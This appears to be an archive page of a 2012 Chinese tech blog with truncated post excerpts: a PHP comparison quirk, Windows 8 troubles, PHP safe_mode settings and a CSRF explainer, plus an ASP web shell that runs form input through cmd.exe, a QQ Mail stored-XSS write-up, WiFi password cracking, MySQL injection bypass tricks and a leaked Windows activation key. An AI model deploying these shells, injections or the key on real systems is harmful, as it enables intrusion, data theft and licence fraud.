2012年8月

php中‘0’与其他字符串比较的问题

今天在写php的时候,偶然发现一个特别好玩的事情,具体代码如下:$a = 0; if($a == 'abc'){ echo 'true'; }else{ echo 'false'; } 怎么样,代码看上去很简单吧?  所以呢?输出结果是 "false" ?  NO,NO,NO 没那么简单,大家可以自己试一下,这段代码的输出结果是 “true” !!  真的!! 就是这样一段代码,折腾了我一上午,始终没有弄明白 这个 ‘0’ 怎么能和 ‘abc’相等呢?后来换个几个数字发现,只有0返回‘true’,其他数字返回‘false’。。。。而且0还可以和null相等。。。。这一度让我感觉我的世界观是错误的?!!后来还好有高人之路,终于把这一段迷惑给解开了,下面来分享一下:这是因为一个数字和一个字符串进行比较,PHP会把字符串转换成数字再进行比较。PHP转换的规则的是:若字符串以数字开头,则取开头数字作为转换结果,若无则输出0。 例如:123abc转换后应该是123,而abc则为0,0==0这...

快速破解WiFi密码

00x00 前言 *为什么我会买8187? 前几个月,家里被停了宽带,按奈不住,打电话给小区外面的整电脑的地方,他们那里竟然有卡皇买,没多想就买了下来.(貌似当时被坑得挺厉害的. 8187芯片 淘宝卖也不超过60.那奸商竟然卖给我300 [有小雷达天线 那货能值多少!!]还说给我优惠了 原价480 各位要入手的注意了哦)   00x01 破解前准备 1.Vmware虚拟机(加载cdlnux.iso) 1.cdlinux.iso(文章底部提供下载) 如果想锻炼自己的,可以选用BT6进行测试,那是更专业的研究平台 3.8187l or 3070 芯片的外置网卡一张(教程使用8187l网卡测试) 4.安装网卡驱动(提供8187驱动下载)     00x02 灌输理论 >.插个话:路由器加密方式 WPA-PSK/WPA2-PSK ; WPA/WPA2 ; WEP 这3种加密方式. ...

win8的神KEY电话激活之旅

今天终于把我这蛋疼的win8给激活了,哈哈哈哈,好东西,不独享,分享出来给还没激活的童鞋们点帮助,嘿嘿,快快激活去吧~ Key:NB7P3-C66T2-848FB-M3BJB-2PKVC过程:①:请先接好麦克风,很重要!【无论好坏,不然会提示No key pressed. 大概意思就是没有按下按键】②:然后设置Key : 用管理员权限命令提示符,输入 slmgr.vbs -ipk NB7P3-C66T2-848FB-M3BJB-2PKVC ,然后稍等会提示设置密匙成功.③:安装好Skype,注册账号,然后断开网络. ④:接着右击计算机,属性,拉到最后,点击“在windows激活中查看详细信息”,打开windows激活,然后点击“电话激活”⑤:国家要选英国!记住要选英国! 接着会有有一个窗口打开!⑥:这时,连接网络 ,打开skype ,按“拨打电话”,然后点击国旗,转换到英国国旗,接着输入号码:800&n...

Cmd Shell ASP/ASPX/JSP/PHP/CGI【收藏】

Cmd Shell ASP/ASPX/JSP/PHP/CGICmd Shell ASP版本执行命令:<br> <% Dim oScript Dim oScriptnet Dim oFileSys, oFile Dim szCMD,szTempFile szCMD=request.form(".cmd") '从输入框得到cmd On Error Resume Next '如果出现错误,直接跳过,防止弹出错误窗口 set oScript=server.createobject("WSCRIPT.SHELL") '建立shell(wshshell)对象 set oFileSys=server.createobject("scripting.filesystemobject") szTempFile="C:\"& oFileSys.GetTempName() 'GetTempName()是fso建立临时文件的一种方法 Call oScript.Run ("cmd.exe /c "& s...

【求助】win8 笔记本一合盖就重启

小博主这两天刚装了个win8,一开始感觉还听不错的,但是后来发现一个比较严重的问题,本本只要一合盖win8就自觉重启,然后就默认进入了另一个系统了。。。  这个让博主甚是郁闷,多次向度娘,谷姐求助未果,不知道有没有大神帮忙指点一下呀~ 送本站VIP一枚哦~  PS:今天看到有从搜索进到这篇日志的童鞋,我表示有和我一样问题的童鞋可以去升级一下系统补丁,小博主表示自己的已经好了~

漂流瓶带来的后续危害:漂流瓶飘来的可能是愿望,也有可能是XSS

只漂流瓶向你飘了过来。。它飘来的可能是对美好生活的向往,可能是对世俗的抱怨,可能是某局长发来的某某某,它,还有可能是XSS!。漂流瓶,作为一项个人认为是“娱乐”的功能,却放在了QQ邮箱这种涉及到个人隐私和私密信息的系统里,一旦存在漏洞,将会导致QQ邮箱本身的安全防护荡然无存。在这个帖子里,我给大家演示的就是,当漂流瓶这个娱乐功能存在存储型XSS之后,对邮箱这个核心功能所带来的影响。 同学们~ 还敢玩漂流瓶么? 当你打开一个漂流瓶之后,QQ号码信息,邮箱里的小秘密就被我知道了,会是一种什么感觉呢?1. 漏洞成因:漂流瓶某处参数过滤不当,导致存储型XSS。具体测试过程:1.1 发送一个漂流瓶,并使用漂流瓶的录音功能。 1.2 定位到发送的漂流上,F12打开调试工具看代码。1.3 同时查看抓包的代码,可以看到相同内容。1.4 进而进行字符测试,测试使用\u0022\u003E时,发生侧漏1.5 说明这里对反斜线的过滤存在问题。1.6 进一步构造我们的利用代码。下面仅贴出部分源码。请求时的利用代码 var serv="恶意外部JS文件所在服务器...

本本的win8之旅

前天下午下了一个win8 RTM版的镜像,然后昨天就开始了我辉煌的win8的革新时代。。。。快中午的时候,把我的小本本打开了,进入那个已经不堪入目的win7。。。。  好吧,开始升级。。。。。选择了升级到win8之后,就出去吃饭去了,吃完饭回来。。。。- -!  悲剧鸟。。。。 黑屏,还是一直黑着。。。。  好吧,包大人,你赢了~ 强制关机,然后,天啊~  这个难道就是可爱的win8欢迎动画?!  然后。。。。  好吧,包大人,我求你了,别来烦我了。。。黑屏着,重启着。。。。  NND,以后装系统的时候再也不出去了。。。下午把本本带到了办公室里,借了一张盘,把C盘直接格掉,重新装了一遍,哇哈哈哈~  我的小win8,终于见到你了~ 但是我知道我的另一个系统肯定又被软禁在硬盘里了(本人的win和linux双系统),算了,先不管你了,先爽...

php中安全模式safe_mode配置教程

(1) 打开php的安全模式 php的安全模式是个非常重要的内嵌的安全机制,能够控制一些php中的函数,比如system(), 同时把很多文件操作函数进行了权限控制,也不允许对某些关键文件的文件,比如/etc/passwd, 但是默认的php.ini是没有打开安全模式的,我们把它打开: safe_mode = on (2) 用户组安全 当safe_mode打开时,safe_mode_gid被关闭,那么php脚本能够对文件进行访问,而且相同 组的用户也能够对文件进行访问。 建议设置为: safe_mode_gid = off 如果不进行设置,可能我们无法对我们服务器网站目录下的文件进行操作了,比如我们需要 对文件进行操作的时候。 (3) 安全模式下执行程序主目录 如果安全模式打开了,但是却是要执行某些程序的时候,可以指定要执行程序的主目录: safe_mode_exec_dir = D:/usr/bin 一般情况下是不需要执行什么程序的,所以推荐不要执行系统程序目录,可...

浅谈CSRF攻击方式,Cross-site request forgery,跨站请求伪造详解

一.CSRF是什么?CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么?你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。三.CSRF漏洞现状CSRF这种攻击方式在2000年已经被国外的安全人员提出,但在国内,直到06年才开始被关注,08年,国内外的多个大型社区和交互网站分别爆出CSRF漏洞,如:NYTimes.com(纽约时报)、Metafilter(一个大型的BLOG网站),YouTube和百度HI......而现在,互联网上的许多站点仍对此毫无防备,以至于安全业界称CSRF为“沉睡的巨人”。四.CSRF的原理下图简单阐述了CSRF攻击的思想:从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个...

mysql注入总结

标题:mysql注入总结作者:L.N.时间:2012-07-23博客:lanu.sinaapp.com 目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性 0x07 声明 正文: 0x00 mysql一般注入(select) 1.注释符#/*-- 2.过滤空格注入使用/**/或()或+代替空格%0c = form feed, new page%09 = horizontal tab%0d = carriage return%0a = line feed, new line 3.多条数据显示concat()group_concat()concat_ws() 4.相关函数system_user() 系统用户名user() 用户名current_user...